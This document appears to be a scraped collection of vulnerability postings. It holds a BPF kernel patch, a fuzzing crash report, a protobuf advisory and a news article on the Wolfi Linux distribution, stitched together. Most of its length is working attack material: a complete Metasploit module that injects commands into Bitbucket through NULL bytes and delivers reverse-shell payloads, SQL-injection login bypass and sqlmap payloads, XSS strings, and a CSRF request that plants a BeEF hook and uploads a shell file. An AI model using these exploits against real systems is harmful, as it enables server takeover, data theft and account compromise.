There exists an arbitrary memory read within the Linux Kernel BPF - Constants provided to fill pointers in structs passed in to bpf_sys_bpf are not verified and can point anywhere, including memory not owned by BPF. An attacker with CAP_BPF can arbitrarily read memory from anywhere on the system. We recommend upgrading past commit 86f44fcec22c

bpf: Disallow bpf programs call prog\_run command.

The verifier cannot perform sufficient validation of bpf\_attr->test.ctx\_in pointer, therefore bpf programs should not be allowed to call BPF\_PROG\_RUN command from within the program. To fix this issue split bpf\_sys\_bpf() bpf helper into normal kern\_sys\_bpf() kernel function that can only be used by the kernel light skeleton directly. Reported-by: YiFei Zhu <zhuyifei@google.com> Fixes: b1d18a7574d0 ("bpf: Extend sys\_bpf commands for bpf\_syscall programs.") Signed-off-by: Alexei Starovoitov <ast@kernel.org>

@@ -5071,9 +5071,6 @@ static bool syscall\_prog\_is\_valid\_access(int off, int size,

BPF\_CALL\_3(bpf\_sys\_bpf, int, cmd, union bpf\_attr \*, attr, u32, attr\_size)

{

\- struct bpf\_prog \* \_\_maybe\_unused prog;

\- struct bpf\_tramp\_run\_ctx \_\_maybe\_unused run\_ctx;

\-

switch (cmd) {

case BPF\_MAP\_CREATE:

case BPF\_MAP\_UPDATE\_ELEM:

@@ -5083,6 +5080,18 @@ BPF\_CALL\_3(bpf\_sys\_bpf, int, cmd, union bpf\_attr \*, attr, u32, attr\_size)

case BPF\_LINK\_CREATE:

case BPF\_RAW\_TRACEPOINT\_OPEN:

break;

\+ default:

\+ return -EINVAL;

\+ }

\+ return \_\_sys\_bpf(cmd, KERNEL\_BPFPTR(attr), attr\_size);

+}

+

+int kern\_sys\_bpf(int cmd, union bpf\_attr \*attr, unsigned int size)

+{

\+ struct bpf\_prog \* \_\_maybe\_unused prog;

\+ struct bpf\_tramp\_run\_ctx \_\_maybe\_unused run\_ctx;

+

\+ switch (cmd) {

#ifdef CONFIG\_BPF\_JIT /\* \_\_bpf\_prog\_enter\_sleepable used by trampoline and JIT \*/

case BPF\_PROG\_TEST\_RUN:

if (attr->test.data\_in || attr->test.data\_out ||

@@ -5113,11 +5122,10 @@ BPF\_CALL\_3(bpf\_sys\_bpf, int, cmd, union bpf\_attr \*, attr, u32, attr\_size)

return 0;

#endif

default:

\- return -EINVAL;

\+ return \_\_\_\_bpf\_sys\_bpf(cmd, attr, size);

}

\- return \_\_sys\_bpf(cmd, KERNEL\_BPFPTR(attr), attr\_size);

}

\-EXPORT\_SYMBOL(bpf\_sys\_bpf);

+EXPORT\_SYMBOL(kern\_sys\_bpf);

static const struct bpf\_func\_proto bpf\_sys\_bpf\_proto = {

.func = bpf\_sys\_bpf,

@@ -66,13 +66,13 @@ struct bpf\_load\_and\_run\_opts {

const char \*errstr;

};

\-long bpf\_sys\_bpf(\_\_u32 cmd, void \*attr, \_\_u32 attr\_size);

+long kern\_sys\_bpf(\_\_u32 cmd, void \*attr, \_\_u32 attr\_size);

static inline int skel\_sys\_bpf(enum bpf\_cmd cmd, union bpf\_attr \*attr,

unsigned int size)

{

#ifdef \_\_KERNEL\_\_

\- return bpf\_sys\_bpf(cmd, attr, size);

\+ return kern\_sys\_bpf(cmd, attr, size);

#else

return syscall(\_\_NR\_bpf, cmd, attr, size);

#endif

CVE-2022-2785: git/bpf/bpf.git - BPF kernel tree

OTFCC commit 617837b was discovered to contain a segmentation violation via /lib/x86_64-linux-gnu/libc.so.6+0xbb384.

**Product Link**

https://github.com/caryll/otfcc

**POC file**

https://github.com/Cvjark/Poc/files/9059947/id4\_SEGV\_sample\_libc6\_%2B0xbb384.zip

**Command to reproduce**

./otfccbuild --pretty [sample file] -o /dev/null

**Product name & version**

last github commit code : 617837b

**Problem Type**

SEGV

**Crash Detail**

    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==6233==ERROR: AddressSanitizer: SEGV on unknown address 0x6120002ad5dd (pc 0x7fbef8354384 bp 0x7ffecdbe0f10 sp 0x7ffecdbe06a8 T0)
    ==6233==The signal is caused by a READ memory access.
    ==6233==WARNING: failed to fork (errno 12)
    ==6233==WARNING: failed to fork (errno 12)
    ==6233==WARNING: failed to fork (errno 12)
    ==6233==WARNING: failed to fork (errno 12)
    ==6233==WARNING: failed to fork (errno 12)
    ==6233==WARNING: Failed to use and restart external symbolizer!
        #0 0x7fbef8354384  (/lib/x86_64-linux-gnu/libc.so.6+0xbb384)
        #1 0x4ad6eb  (/home/bupt/Desktop/otfcc/bin/release-x64/otfccdump+0x4ad6eb)
        #2 0x6b53ed  (/home/bupt/Desktop/otfcc/bin/release-x64/otfccdump+0x6b53ed)
        #3 0x6b6d86  (/home/bupt/Desktop/otfcc/bin/release-x64/otfccdump+0x6b6d86)
        #4 0x5265aa  (/home/bupt/Desktop/otfcc/bin/release-x64/otfccdump+0x5265aa)
        #5 0x4fe3fe  (/home/bupt/Desktop/otfcc/bin/release-x64/otfccdump+0x4fe3fe)
        #6 0x4f5710  (/home/bupt/Desktop/otfcc/bin/release-x64/otfccdump+0x4f5710)
        #7 0x7fbef82bac86  (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)
        #8 0x41c549  (/home/bupt/Desktop/otfcc/bin/release-x64/otfccdump+0x41c549)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/libc.so.6+0xbb384) 
    ==6233==ABORTING
    

**Crash summary**

    SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/libc.so.6+0xbb384)

CVE-2022-35023: Poc/CVE-2022-35023.md at main · Cvjark/Poc

Various versions of Bitbucket Server and Data Center are vulnerable to an unauthenticated command injection vulnerability in multiple API endpoints. The /rest/api/latest/projects/{projectKey}/repos/{repositorySlug}/archive endpoint creates an archive of the repository, leveraging the git-archive command to do so. Supplying NULL bytes to the request enables the passing of additional arguments to the command, ultimately enabling execution of arbitrary commands.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Bitbucket Git Command Injection',        'Description' => %q{          Various versions of Bitbucket Server and Data Center are vulnerable to          an unauthenticated command injection vulnerability in multiple API endpoints.          The `/rest/api/latest/projects/{projectKey}/repos/{repositorySlug}/archive` endpoint          creates an archive of the repository, leveraging the `git-archive` command to do so.          Supplying NULL bytes to the request enables the passing of additional arguments to the          command, ultimately enabling execution of arbitrary commands.        },        'License' => MSF_LICENSE,        'Author' => [          'TheGrandPew', # discovery          'Ron Bowes', # analysis and PoC          'Jang', # testanull - PoC          'Shelby Pace' # Metasploit module        ],        'References' => [          [ 'URL', 'https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html' ],          [ 'URL', 'https://attackerkb.com/topics/iJIxJ6JUow/cve-2022-36804/rapid7-analysis' ],          [ 'URL', 'https://www.rapid7.com/blog/post/2022/09/20/cve-2022-36804-easily-exploitable-vulnerability-in-atlassian-bitbucket-server-and-data-center/' ],          [ 'CVE', '2022-36804' ]        ],        'Platform' => [ 'linux' ],        'Privileged' => false,        'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD ],        'Targets' => [          [            'Linux Dropper',            {              'Platform' => 'linux',              'Type' => :linux_dropper,              'Arch' => [ ARCH_X86, ARCH_X64 ],              'CmdStagerFlavor' => %w[wget curl bourne],              'DefaultOptions' => { 'Payload' => 'linux/x64/meterpreter/reverse_tcp' }            }          ],          [            'Unix Command',            {              'Platform' => 'unix',              'Type' => :unix_cmd,              'Arch' => ARCH_CMD,              'Payload' => { 'BadChars' => %(:/?#[]@) },              'DefaultOptions' => { 'Payload' => 'cmd/unix/reverse_bash' }            }          ]        ],        'DisclosureDate' => '2022-08-24',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [ CRASH_SAFE ],          'Reliability' => [ IOC_IN_LOGS ],          'SideEffects' => [ REPEATABLE_SESSION ]        }      )    )    register_options(      [        Opt::RPORT(7990),        OptString.new('TARGETURI', [ true, 'The base URI of Bitbucket application', '/']),        OptString.new('USERNAME', [ false, 'The username to authenticate with', '' ]),        OptString.new('PASSWORD', [ false, 'The password to authenticate with', '' ])      ]    )  end  def check    res = send_request_cgi(      'method' => 'GET',      'keep_cookies' => true,      'uri' => normalize_uri(target_uri.path, 'login')    )    return CheckCode::Unknown('Failed to receive response from application') unless res    unless res.body.include?('Bitbucket')      return CheckCode::Safe('Target does not appear to be Bitbucket')    end    footer = res.get_html_document&.at('footer')    return CheckCode::Detected('Cannot determine version of Bitbucket') unless footer    version_str = footer.at('span')&.children&.text    return CheckCode::Detected('Cannot find version string in footer') unless version_str    matches = version_str.match(/v(\d+\.\d+\.\d+)/)    return CheckCode::Detected('Version unknown') unless matches && matches.length > 1    version_str = matches[1]    vprint_status("Found Bitbucket version: #{matches[1]}")    num_vers = Rex::Version.new(version_str)    return CheckCode::NotVulnerable if num_vers <= Rex::Version.new('6.10.17')    major, minor, revision = version_str.split('.')    case major    when '6'      return CheckCode::Appears    when '7'      case minor      when '6'        return CheckCode::Appears if revision.to_i < 17      when '17'        return CheckCode::Appears if revision.to_i < 10      when '21'        return CheckCode::Appears if revision.to_i < 4      end    when '8'      case minor      when '0', '1'        return CheckCode::Appears if revision.to_i < 3      when '2'        return CheckCode::Appears if revision.to_i < 2      when '3'        return CheckCode::Appears if revision.to_i < 1      end    end    CheckCode::Detected  end  def username    datastore['USERNAME']  end  def password    datastore['PASSWORD']  end  def authenticate    print_status("Attempting to authenticate with user '#{username}' and password '#{password}'")    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'login'),      'keep_cookies' => true    )    fail_with(Failure::UnexpectedReply, 'Failed to reach login page') unless res&.body&.include?('login')    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'j_atl_security_check'),      'keep_cookies' => true,      'vars_post' =>      {        'j_username' => username,        'j_password' => password,        'submit' => 'Log in'      }    )    fail_with(Failure::UnexpectedReply, 'Failed to retrieve a response from log in attempt') unless res    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'dashboard'),      'keep_cookies' => true    )    fail_with(Failure::UnexpectedReply, 'Failed to receive a response from the dashboard') unless res    unless res.body.include?('Your work') && res.body.include?('Projects')      fail_with(Failure::BadConfig, 'Login failed...Credentials may be invalid')    end    @authenticated = true    print_good('Successfully logged into Bitbucket!')  end  def find_public_repo    print_status('Searching Bitbucket for publicly accessible repository')    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'rest/api/latest/repos'),      'keep_cookies' => true    )    fail_with(Failure::Disconnected, 'Did not receive a response') unless res    json_data = JSON.parse(res.body)    fail_with(Failure::UnexpectedReply, 'Response had no JSON') unless json_data    unless json_data['size'] > 0      fail_with(Failure::NotFound, 'Bitbucket instance has no publicly available repositories')    end    # opt for public repos unless none exist.    # Attempt to use a private repo if so    repos = json_data['values']    possible_repos = repos.select { |repo| repo['public'] == true }    if possible_repos.empty? && @authenticated      possible_repos = repos.select { |repo| repo['public'] == false }    end    fail_with(Failure::NotFound, 'There doesn\'t appear to be any repos to use') if possible_repos.empty?    possible_repos.each do |repo|      project = repo['project']      next unless project      @project = project['key']      @repo = repo['slug']      break if @project && @repo    end    fail_with(Failure::NotFound, 'Failed to find a repo to use for exploit') unless @project && @repo    print_good("Found public repo '#{@repo}' in project '#{@project}'!")  end  def execute_command(cmd, _opts = {})    uri = normalize_uri(target_uri.path, 'rest/api/latest/projects', @project, 'repos', @repo, 'archive')    send_request_cgi(      'method' => 'GET',      'uri' => uri,      'keep_cookies' => true,      'vars_get' =>      {        'format' => 'zip',        'path' => Rex::Text.rand_text_alpha(2..5),        'prefix' => "#{Rex::Text.rand_text_alpha(1..3)}\x00--exec=`#{cmd}`\x00--remote=#{Rex::Text.rand_text_alpha(3..8)}"      }    )  end  def exploit    @authenticated = false    authenticate unless username.blank? && password.blank?    find_public_repo    if target['Type'] == :linux_dropper      execute_cmdstager(linemax: 6000)    else      execute_command(payload.encoded)    end  endend

Bitbucket Git Command Injection

Linux stable versions 5.4 and 5.10 suffers from a page use-after-free via stale TLB caused by an rmap lock not held during PUD move.

Linux Stable 5.4 / 5.10 Use-After-Free / Race Condition

WorkOrder CMS version 0.1.0 suffers from a cross site scripting vulnerability.

Change Mirror Download

    # Exploit Title: WorkOrder CMS 0.1.0 Cross-Site Scripting (XSS)# Date: Sep 22, 2022# Exploit Author: Chokri Hammedi# Vendor Homepage: https://github.com/romzes13/WorkOrderCMS# Software Link:https://github.com/romzes13/WorkOrderCMS/archive/refs/tags/v0.1.0.zip# Version: 0.1.0# Tested on: Linux# Payload:username:<u>test1337<script>alert('hi');</script>password:<u>test1337<script>alert('hi');</script>

WorkOrder CMS 0.1.0 Cross Site Scripting

WorkOrder CMS version 0.1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    # Exploit Title: WorkOrder CMS 0.1.0 SQLI# Date: Sep 22, 2022# Exploit Author: Chokri Hammedi# Vendor Homepage: https://github.com/romzes13/WorkOrderCMS# Software Link:https://github.com/romzes13/WorkOrderCMS/archive/refs/tags/v0.1.0.zip# Version: 0.1.0# Tested on: Linux# Auth Bypass:username:' or '1'='1password:' or '1'='1#sqlmap -r workorder.req --threads=10 --level 5 --risk 3 --dbs --dbms=mysql# POST Requests:Parameter: #1* ((custom) POST)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUPBY clause (FLOOR)    Payload: userName=1'='1&password=1/' AND (SELECT 3761 FROM(SELECTCOUNT(*),CONCAT(0x7170627071,(SELECT(ELT(3761=3761,1))),0x71787a7871,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- UUhY!1111'/    Type: stacked queries    Title: MySQL >= 5.0.12 stacked queries (comment)    Payload: userName=1'='1&password=1/';SELECT SLEEP(5)#!1111'/    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: userName=1'='1&password=1/' AND (SELECT 6822 FROM(SELECT(SLEEP(5)))lYsh)-- YlDI!1111'/Parameter: #2* ((custom) POST)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUPBY clause (FLOOR)    Payload: userName=1'='1&password=1/!1111' AND (SELECT 2010 FROM(SELECTCOUNT(*),CONCAT(0x7170627071,(SELECT(ELT(2010=2010,1))),0x71787a7871,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- tqtn/    Type: stacked queries    Title: MySQL >= 5.0.12 stacked queries (comment)    Payload: userName=1'='1&password=1/!1111';SELECT SLEEP(5)#/    Type: time-based blind    Title: MySQL >= 5.0.12 OR time-based blind (SLEEP)    Payload: userName=1'='1&password=1/!1111' OR SLEEP(5)-- XuTW/

WorkOrder CMS 0.1.0 SQL Injection

Multix version 2.4 suffers from a cross site request forgery vulnerability.

    # Exploit Title: Multix - Multipurpose Website CMS with Codeigniter Cross Site Request Forgery# Exploit Author: th3d1gger# Vendor Homepage: https://codecanyon.net# Software Link: https://codecanyon.net/item/multix-multipurpose-website-cms-with-codeigniter/23537596# Version: Version 2.4# Tested on Ubuntu 18.04-------Request-----------POST /admin/file/add HTTP/1.1Host: localhostContent-Length: 466Cache-Control: max-age=0sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"Origin: http://localhostUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryE0mBtYGic6umB5VeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: emptyReferer: http://localhost/admin/file/addAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: allow=1;Connection: close------WebKitFormBoundaryE0mBtYGic6umB5VeContent-Disposition: form-data; name="file_title"<iframe src="http://local.proxy:3000/?url=http://localhost/beefhook.html"></iframe>------WebKitFormBoundaryE0mBtYGic6umB5VeContent-Disposition: form-data; name="file_name"; filename="shell2.php .jpg"Content-Type: imageasdasd------WebKitFormBoundaryE0mBtYGic6umB5VeContent-Disposition: form-data; name="form1"------WebKitFormBoundaryE0mBtYGic6umB5Ve--

Multix 2.4 Cross Site Request Forgery

Multix version 2.4 suffers from a cross site scripting vulnerability.

    # Exploit Title: Multix - Multipurpose Website CMS with Codeigniter Reflected Cross Site Scripting# Exploit Author: th3d1gger# Vendor Homepage: https://codecanyon.net# Software Link: https://codecanyon.net/item/multix-multipurpose-website-cms-with-codeigniter/23537596# Version: Version 2.4# Tested on Ubuntu 18.04-------Request-----------POST /search HTTP/1.1Host: localhostContent-Length: 24Cache-Control: max-age=0sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"Origin: http://localhostUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36Content-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: emptyReferer: http://localhost/searchAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: allow=1; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=eyJpdiI6IlRwa1o2cDhxRGtqTUxKL2tLS0NiVGc9PSIsInZhbHVlIjoiajVqT2VOeTk5RmVXY20yaG44ekFQbTc4OFZ3K2EvbThhTFFVUjBzdVpZNmtDQVlocndZU1pEeWFlaURPWDl3V2JsZGFxeDYyR1NWRGoyVHRDYW9iVExUck12NTNjVHZ3VWF2eHNWN1dScXNRdW81ZUNPeldnZ2FRdHVxODlsWnI1cDhWOEcvQlZWSi83VEM5WTJNNC9CME5PWVVyU2dDNWhNcUlvSXU1UWlsQjF2eTYxdmQ2aW5EZHNkYVBQMUpObEN2aFp6Y0tvUkhrUkFac0ZveURZZ0NFMHlPWjRYYSs0eTNTR3VPVXZUMD0iLCJtYWMiOiJjYmU1ZWYxODJlZjYyNzAyODI5YjM4NWEzMDgyYWFkMzA2YmIzOWM3ODA3ZjgyNjMzZWRjMDc3MDkxNWEzZGQ3In0%3D; ci_session=b3568d851b75f1b0191447e7b8ba35860e8c8e56; twk_idm_key=-J__vZrlSOiy2FYLE4Fsu; TawkConnectionTime=0; twk_uuid_5a7c31ded7591465c7077c48=%7B%22uuid%22%3A%221.AGEpC4jGGoH2T6v2QAlePuWJRFfI9oZIu0RUbaNluAgJJzDJQ1zFcS1Fv9uH7mP6PIgcXCE6JVCXLF7JZsX0kHOsQNihqwO81D79ESmlYkVwYf5UHnjWKkJkiJPYK7Dn%22%2C%22version%22%3A3%2C%22domain%22%3Anull%2C%22ts%22%3A1663795200266%7DConnection: closesearch_string=<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>&form1=

Multix 2.4 Cross Site Scripting

A parsing vulnerability for the MessageSet type in the ProtocolBuffers versions prior to and including 3.16.1, 3.17.3, 3.18.2, 3.19.4, 3.20.1 and 3.21.5 for protobuf-cpp, and versions prior to and including 3.16.1, 3.17.3, 3.18.2, 3.19.4, 3.20.1 and 4.21.5 for protobuf-python can lead to out of memory failures. A specially crafted message with multiple key-value per elements creates parsing issues, and can lead to a Denial of Service against services receiving unsanitized input. We recommend upgrading to versions 3.18.3, 3.19.5, 3.20.2, 3.21.6 for protobuf-cpp and 3.18.3, 3.19.5, 3.20.2, 4.21.6 for protobuf-python. Versions for 3.16 and 3.17 are no longer updated.

CVE-2022-1941: Security Bulletins  |  Customer Care  |  Google Cloud

Security firm Chainguard has created a simple, open source way for organizations to defend the cloud against some of the most insidious attacks.

In the wake of alarming incidents like Russia’s massive 2017 NotPetya malware attack and the Kremlin’s 2020 SolarWinds cyberespionage campaign—both pulled off by poisoning wells for software distribution—organizations around the world have been scrambling to get a handle on software supply chain security. In general, and for open source software in particular, stronger defense rests in knowing what software you’re actually running, with a crucial focus on enumerating all the little pieces that make up the whole and validating that they are what they should be. That way, when you pack a box of software heirlooms and store it on a shelf, you know there isn’t a live microphone or a Tupperware full of deviled eggs sitting in the box for years. 

Creating a system to generate a manifest of what’s inside every box in every basement and garage is a massive effort, but a new tool from security firm Chainguard aims to do just that for the software "containers” that underly almost all digital services today.

On Thursday, Chainguard launched a Linux distribution called Wolfi that is designed specifically for how digital systems are actually built today in the cloud. Most consumers don’t use Linux, the famed open source operating system, on their personal computers. (If they do, they don’t necessarily know it, as is the case with Android, which is built on a modified version of Linux.) But the open source operating system is widely used in servers and cloud infrastructure around the world, partly because it can be deployed in such flexible ways. Unlike operating systems from Microsoft and Apple, where your only choice is whatever ice cream flavor they release, the open nature of Linux allows developers to create all sorts of flavors—known as “distributions”—to suit specific cravings and needs. But the developers at Chainguard, who have all been working in open source software for years, including on other Linux distributions, felt that a key flavor was missing.

“What we’ve done is built a distribution that we feel will work well for enterprises looking to seriously address supply chain security,” says Chainguard principal engineer Ariadne Conill. “Different distributions have different pieces of software that they include—they’re curated collections of software. By starting with a Linux distribution that gets everything right from the beginning, that’s a huge advantage for software developers to get their own stuff right.”

Think of software containers like a home built out of a shipping container. Everything you need to live is in there, but you can pick up the container house and move it wherever it needs to go. If an operating system is like the appliances, electrical wiring, plumbing, and other infrastructure in the container home, that’s what Wolfi is vetting and pre-itemizing to ensure the security of everything in your container house. Wolfi is designed to work smoothly with other tools from Chainguard that help developers build out and add to the software in their container in a secure way. In other words, it’s simple to validate furniture and personal effects and add them to your container home index. That way, if your house gets broken into, it’s easier to determine what happened and how. And if you ever want to ship your house overseas, you have a detailed manifest to show customs.

“It’s the exact same thing with software as with physical goods—there can be contraband or counterfeit goods that people are trying to hide and sneak by,” says Adolfo Garcia, a software engineer at Chainguard. “For software, if you don’t have the capability to collect the information at build time, you’re going to be missing a lot about what’s in there.”

In software supply chain security, and particularly in open source environments where there are generally fewer resources to invest in improvements, the stakes are high—and governments have started taking the problem seriously. In May 2021, the Biden administration issued an executive order that specifically addressed software supply chain security imperatives. And last week, the White House announced that the US Office of Management and Budget had issued specific supply chain security guidance to federal agencies.

“Not too long ago, the only real criteria for the quality of a piece of software was whether it worked as advertised. With the cyber threats facing Federal agencies, our technology must be developed in a way that makes it resilient and secure,” Chris DeRusha, the US federal chief information security officer and deputy national cyber director, wrote in the White House announcement. "This is not theoretical: Foreign governments and criminal syndicates are regularly seeking ways to compromise our digital infrastructure.”

When it comes to Wolfi, Santiago Torres-Arias, a software supply chain researcher at Purdue University, says that developers could accomplish some of the same protections with other Linux distributions, but that it’s a valuable step to see a release that’s been stripped down and purpose-built with supply chain security and validation in mind.

“There’s past work, including work done by people who are now at Chainguard, that was kind of the precursor of this train of thought that we need to remove the potentially vulnerable elements and list the software included in a particular container or Linux release,” Torres-Arias says. “Something like this is part of a constellation of software supply chain controls. And on a technical level, it’s a straightforward idea. But on a business level, in terms of getting organizations to adopt these practices, it could be very good.”

Both Torres-Arias and Chainguard’s CEO, Dan Lorenc, point out that generating a manifest—known in software supply chain security as a “software bill of materials,” or SBOM—doesn’t produce better security in itself. It’s how organizations act on the information that will really make the difference. But as with anything in security, a defense is only valuable and protective if it’s already in place before something goes awry.

“People have been struggling to make things work with distributions that previously existed and other workarounds,” Chainguard’s Conill says. “But they can have a piece of software, a dependency in there that they didn’t know was there until they find out the hard way. And, you know, suddenly it turns out that there was a little baggie of coke in that teddy bear in the container.”

Tag

#linux